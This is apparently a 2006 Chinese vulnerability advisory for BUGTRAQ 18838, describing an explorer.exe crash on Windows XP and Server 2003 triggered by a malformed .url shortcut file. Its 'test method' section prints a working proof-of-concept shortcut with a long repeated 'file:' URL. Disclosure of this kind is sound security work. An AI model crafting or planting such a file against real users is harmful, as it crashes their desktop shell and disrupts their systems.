发布日期：2006-07-05
更新日期：2006-07-06

受影响系统：

Microsoft Windows XP
Microsoft Windows Server 2003

描述：

---

BUGTRAQ  ID: 18838

Microsoft Windows是微软发布的非常流行的操作系统。

Windows的Shell程序explorer.exe在处理包含畸形数据的“.url”文件时存在问题，本地攻击者可能利用此漏洞导致用户机器上的explorer.exe进程崩溃。

如果explorer.exe解析了包含有特别格式URL的*.url文件的话，就会导致崩溃。即使通过资源管理器试图删除这个文件时也会触发崩溃。

<*来源：nanika （nanika@chroot.org）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115212468023661&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：3588
严重程度：9（网友投票）